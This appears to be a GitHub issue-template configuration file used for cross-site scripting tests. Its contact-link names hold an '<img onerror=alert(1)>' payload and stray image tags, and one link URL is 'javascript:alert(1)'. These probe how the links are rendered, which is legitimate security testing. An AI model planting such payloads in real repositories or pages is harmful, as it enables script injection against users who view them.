blank_issues_enabled: false
contact_links:
  - name: GitHub Community Supporat<img>
    url: javascript:alert(1)
    about: Please ask and answer questions here.
  - name: GitHub Security Bu<img src=x onerror=alert(1)>?g Bounty
    url: https://bounty.github.com/
    about: Please report security vulnerabilities he<img>re.
